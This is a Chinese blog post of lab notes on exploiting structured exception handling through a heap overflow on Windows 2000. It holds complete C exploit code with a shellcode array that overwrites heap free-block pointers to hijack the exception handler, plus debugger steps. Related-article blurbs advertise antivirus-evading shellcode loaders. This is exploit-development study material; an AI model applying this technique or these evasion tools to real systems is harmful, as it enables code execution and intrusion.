5.7 在堆溢出中利用S.E.H

最新推荐文章于 2024-07-05 18:31:23 发布
最新推荐文章于 2024-07-05 18:31:23 发布
阅读量136 收藏 1
点赞数 1
分类专栏: 0day安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/127180892
版权

目录

一、实验环境

二、实验代码

三、实验步骤

一、实验环境

        操作系统:Windows 2000 professional

        软件版本:原版OD(实时调试状态)、VC++6.0(release)

二、实验代码

#include <windows.h> 
char shellcode[]= 
"\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C" 
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53" 
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" 
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95" 
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59" 
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A" 
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75" 
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03" 
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB" 
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50" 
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x16\x01\x1A\x00\x00\x10\x00\x00"// head of the ajacent free block 
"\x88\x06\x36\x00"//0x00360688 is the address of shellcode in first 
//Heapblock 
"\x90\x90\x90\x90";//target of DWORD SHOOT 

DWORD MyExceptionhandler(void) 
{ 
	ExitProcess(1); 
    return 0;
} 

int main() 
{ 
	HLOCAL h1 = 0, h2 = 0; 
	HANDLE hp; 
	hp = HeapCreate(0,0x1000,0x10000); 
	h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,200); 
	memcpy(h1,shellcode,0x200);// over flow here, noticed 0x200 means 
	//512 ! 
	__asm int 3 // uesd to break the process 
	__try 
	{ 
		h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,8); 
	} 
	__except(MyExceptionhandler()){}
    return 0;
}

        代码解释:

  1. 溢出第一个堆块的数据将写入后面的空闲堆块,在第二次分配的时候发生DWORD SHOOT;
  2. 将S.E.H的异常回调函数地址作为DOWRD SHOOT的目标,将其替换为shellcode的入口地址,异常发生后,操作系统会错误的把shellcode当作异常处理函数而执行。

三、实验步骤

1、编译代码,直接跳到OD:

 2、检查OD的异常设置,确保OD不会忽略任何异常。

        “option”->"debugging"

 3、直接按F9,运行到异常处,然后查看S.E.H:

         !!!注意:在重新没有运行进入try...except的时候,查看S.E.H会和程序进入try查看S.E.H不同。

没有进入try..except的S.E.H

4、考虑到S.E.H的结构,将代码中覆盖空闲堆块的blink改为0x0012FF30,注释代码中的中断指令,可弹框。

 

 

PT_silver
关注
专栏目录
shellcodeloader:shellcodeloader
03-11
ShellcodeLoader 语言: Windows的ShellcodeLoader可以绕过AV。 特征 它具有多种加载模式。 32位有13种加载模式,而64位有12种加载模式。 支持发展。 如果发现新的攻击手段,则可以根据指定的方法开发模板。 Shellcode是自动加密的。来自同一Shellcode的加载器的md5不同,因为生成器使用时间作为种子来随机生成128位密钥进行加密。 待办事项清单 环境:生成器使用MFC来实现UI,生成器和加载器模板使用C ++开发,并由VS2015静态编译。 方法:使用vs2015打开项目解决方案(.sln),然后进行编译。当然,您可以从下载产品。 档案文件 该工具由一个生成器(Shellcodeloader.exe)和许多加载器模板组成。 需要将不同的加载器模板放置在目录的相应目录。 最后放在生成器相同目录下的DATA文件夹。 如何使用 打开
shellcode弹出对话框
Linux方程式
11-11 3092
功能是弹出一个对话框。本段代码在VC6.0上编译通过,此shellcode能在所有windows系统上运行且屡试不爽。  char shellcode[]= "\xfc\x68\x6a\x0a\x38\x1e\x68\x63\x89\xd1\x4f\x68\x32\x74\x91\x0c" "\x8b\xf4\x8d\x7e\xf4\x33\xdb\xb7\x04\x2b\xe3\x66\x
探索Shellcode_Loader:一款高效、灵活的Shellcode加载器
gitblog_00002的博客
04-22 662
探索Shellcode_Loader:一款高效、灵活的Shellcode加载器 项目地址:https://gitcode.com/Avienma/shellcode_loader 在安全研究和逆向工程领域,Shellcode是一个关键元素,它是一段可以直接由处理器执行的小型机器码程序。然而,如何安全且有效地加载这些代码并不总是那么简单。这就是Shellcode_Loader项目的用武之地。本文将带...
免杀笔记 ----> ShellCode Loader !!!
huohaowen的博客
07-05 1250
学了那么久的前置知识,终于到了能上线的地方了!!!不过这里还没到免杀的部分,距离bypass一众的杀毒软件还有很长的路要走!!
推荐开源项目:ShellcodeLoader - 高级安全工具,让您的shellcode隐形飞行
gitblog_00065的博客
05-21 313
推荐开源项目:ShellcodeLoader - 高级安全工具,让您的shellcode隐形飞行 项目地址:https://gitcode.com/Hzllaga/ShellcodeLoader 项目介绍 ShellcodeLoader是一款创新性的开源项目,它采用先进的加密技术和反沙箱策略,使得shellcode(一种在操作系统内存执行的机器码)能在复杂的环境隐秘运行。通过RSA加密shel...
CentOS 7 MySQL5.7配置文件my.cnf 配置参数详解
xiongyingli博客
01-23 2586
CentOS 7 MySQL5.7配置文件my.cnf 配置参数详解 1.client options 相关选项 #以下选项会被MySQL客户端应用读取。注意只有MySQL附带的客户端应用程序保证可以读取这段内容。如果你想你自己的MySQL应用程序获取这些值。需要在MySQL客户端库初始化的时候指定这些选项。 [client] port = 3309 socket = /usr/local/mysql/tmp/mysql.sock [mysqld] !include /usr/local/mysql/e
2.SDL规范文档
weixin_30872337的博客
02-27 2301
01.安全设计Checklist 输入验证 校验跨信任边界传递的不可信数据(策略检查数据合法性,含白名单机制等)格式化字符串时,依然要检验用户输入的合法性,避免可造成系统信息泄露或者拒绝服务 禁止向Java Runtime.exec()方法传递不可信、未净化的数据(当参数包含空格,双引号,以-或者/符号开头表示一个参数开关时,可能会导致参数注入漏洞),建议如果可以禁止JVM...
5、CPU Subsystem 01(5.1-5.7
wbin11235的博客
10-07 1163
C297的框图 5、CPU Subsystem 本章描述在Aurix系列设备找到的TriCore cpu的特定实现选项。 包括TriCore1.6P (TC1.6P)和TriCore1.6E (TC1.6E) cpu的详细信息。下表详细介绍了Aurix家族各个成员的CPU和本地内存配置。 本章应与TriCore架构手册一起阅读。 •建筑概述 •编程模型 •CPU寄存器 •任务和职能 •断处理 •陷阱 •内存保护系统 •时间保护系统 •浮点运算 •调试 •指令集 5.1
实战5、用户管理-Client-GUI推荐__2018.6.28
ha_123_qq的博客
07-07 417
用户管理续 mysql_upgrade --skip-grant-tables --skip-networking 场景:密码忘了,升级过程 --skip-grant-tables //无需用户和密码,免密码登录,登录后禁止使用create user,grant,revoke,set password --skip-networking //禁止提供网络验证 忘记...
1.vector与树的操作
107
03-18 6038
那里不会看那里1.vector定义二维数组2.字符串操作 1.vector定义二维数组 1.很多时候类的二维数组的维度往往无法提前知道,因此需要动态的分配内存; 使用new运算符,操作不当往往会操作内存溢出/泄露; vector<vector > array表达的是array是一个二维的int型的vector(实际上相当于一个二维数组); vector<vector > ...
ShellcodeLoader:加载shellcode或PE进行分析的小工具
05-18
ShellcodeLoader 构建ShellcodeLoader的目的是在可执行文件的上下文快速调试在恶意软件分析提取的Shellcode。 ShelcodeLoader的工作是从磁盘到内存读取一个常规文件,然后跳转到基址或指定的入口点以执行该文件。 它会自动检测是否正在调试,并在执行shellcode之前询问用户是否要设置断点。 在x86和x64系统工作。 发行版 转到“发行版”选项卡并下载已编译的可执行文件。 用法 该文件是必需的。 其他参数是可选的。 ShellcodeLoader.exe [-e --entrypoint ENTRYPOINT] [-a --address ADDRESS] [-r --run] [-b --break] FILE 加载文件并以指定的偏移量执行代码 ShellcodeLoader.exe -e 1000 shellcodex86.bi
NimShellCodeLoader:使用nim编写的shellcode加载器
02-03
NimShellCodeLoader Nim编写Windows平台shellcode免杀加载器 快速生成免杀毒性文件 更新: 20210123:增加三种加载shellcode方式,其两种使用了库,需要安装该库才能正常编译 特点: 1:自带通常加载方式 2:可自行拓展加载方式 3:支持两种加密技术,分别位3des加密和凯撒密码,密钥随机,每次生成文件拥有不同的哈希 完全针对技术研究和获得正式授权的测试活动。 ##文件组成: bin存放生成的重组文件 encryption存储加密代码文件 module存放c ++功能文件 安装: 1,安装nim最新版 2,下载本项目,分别编译encryption的Tdea.nim和Caesar.nim 。 nim c -d:release --opt:size Tdea.nim nim c -d:release --opt:size Caesar.nim 3,编译c#项目,将初始化文件放到当前目录 使用方法: 1,打开生成器 2,将有效载荷到该窗口 3,选择加载方式,点击生成,还原文件会保存到bin文件夹 拓展: 1,新建ni
ShellcodeLoader:将shellcode用rsa加密并动态编译exe,自带多个反沙箱技术
03-19
ShellcodeLoader 将shellcode用rsa加密并动态编译exe,自带多个反沙箱技术。 如果要用.NET 2.0编译请手动编译,csc不支持某些代码 反沙箱 判断父进程是否为调试器 判断时间是否加速 一般沙盘内的程序时间都会加速。 判断进程是否有黑名单 判断是不是虚拟机,不过有几个vm进程是本机也会存在的,怕误报可以手动修改黑名单列表。 判断MAC地址是否有黑名单 判断是不是虚拟机的mac地址,有几个地址只要本机有装虚拟机也会有,怕误报可以手动修改黑名单。 判断系统盘是否大于50GB 一个正常的PC的系统盘都会大于50GB。 使用 一般的: 运行生成的exe文件 争论: 程序会保存加密好的数据到Output.txt shellcode.exe“私钥”“加密shellcode” 更新 20200709: 新增x86远程注入(直接复制CACTUSTORCH的) 已知问题 远程
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具
lza20001103的博客
09-04 2497
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具 文章目录ShellCode_Loader - Msf&CobaltStrike免杀ShellCode加载器&加密工具一、声明二、测试环境三、生成Msf_Payload四、生成CobaltStrike_Payload五、加密Payload六、配置ShellCode加载器七、打包可执行程序(EXE编译环境)八、上线测试 ShellCode_Loader - Msf&amp
2021 HW红队样本分析(二) C++ ShellcodeLoader
J0o1ey Blog
08-31 230
0x01 样本概况 Name:国家xx局安全升级文档.docs.exe ico为word的,很显然在利用已知扩展名隐藏的特性在钓鱼 在Virustotal网站上,样本报毒9引擎,基本上绕过了全部国产杀毒,免杀效果相对较好 其样本为C2远控样本,回链地址为39.107.95.197 其回连IP已经被标记为恶意C2 IP 行为特征如下 0x02 样本分析 对该样本进行反编译处理,该恶意样本执行流程如下创建互斥体 检查用户名 检查当前环境是否为虚拟机 检查系统语言 从http://39.107.
探索安全新边界:ShellcodeLoader - 超越反病毒的Windows Shellcode加载器
gitblog_00049的博客
05-13 301
探索安全新边界:ShellcodeLoader - 超越反病毒的Windows Shellcode加载器 项目地址:https://gitcode.com/knownsec/shellcodeloader ShellcodeLoader是一款专为Windows平台设计的开源工具,旨在绕过传统的反病毒软件(AV),并提供了多种加载模式和可扩展性,让恶意代码编写者能够开发出更隐蔽、更难以检测的payl...
一个简单的弹出对话框的shellcode(取自0day2一书)
我多么希望明天有太阳,来灼烧我腐烂的梦想
02-13 2091
int main() { _asm{ nop nop nop nop nop CLD ; clear flag DF ;store hash push 0x1e380
shellcodeloader
xuqi7
06-26 362
调试执行 shellcode
shellcodeloader---用于加载bin文件进行调试
xuqi7
09-23 1763
代码摘自《加密与解密》 #include "stdafx.h" #include <Windows.h> int main(int argc, char* argv[]) { HANDLE fp; unsigned char* fBuffer; DWORD fSize, dwSize; fp = CreateFile("Shellcode_bin.bin", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_ALWAYS, FI
ubuntu20MySQL5.7启动提示IPv6 is not available.
最新发布
09-25
在Ubuntu 20安装并启动MySQL 5.7时遇到 "IPv6 is not available" 的提示,这通常意味着系统未能自动配置IPv6地址,而MySQL需要能够通过网络连接。解决这个问题可以按照以下步骤操作: 1. **检查IPv6配置**:首先确认系统的IPv6功能是否已经启用。打开终端,输入 `sudo nano /etc/network/interfaces` 然后查看是否有 'auto lo' 和 'iface eth0 inet6 static' 这样的行。如果没有,可能需要添加。 2. **手动配置IPv6**:如果IPv6配置未自动添加,你可以尝试手动添加静态IPv6地址,例如: ``` sudo nano /etc/network/interfaces ``` 添加类似下面的内容(将 `ADDRESS` 替换为你的IPv6地址): ``` auto ens4 iface ens4 inet6 static address ADDRESS netmask 64 ``` 3. **重启网络服务**:保存更改后,运行 `sudo service networking restart` 或者 `sudo systemctl restart networking.service`. 4. **验证IPv6状态**:现在检查IPv6配置是否有效,可以用 `ifconfig -a` 或 `ip addr show`。 5. **启动MySQL**:确认IPv6可用后再尝试启动MySQL,命令通常是 `sudo systemctl start mysql` 或者 `sudo service mysql start`。 如果你已经设置了IPv6,但依然遇到此错误,可能是MySQL服务内部的配置问题,这时可以在MySQL的配置文件 `/etc/mysql/my.cnf` 查找 `bind-address` 参数,确保它不是设为了 `localhost` 而应该留空或者设置为 `'0.0.0.0'` 来监听所有接口。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值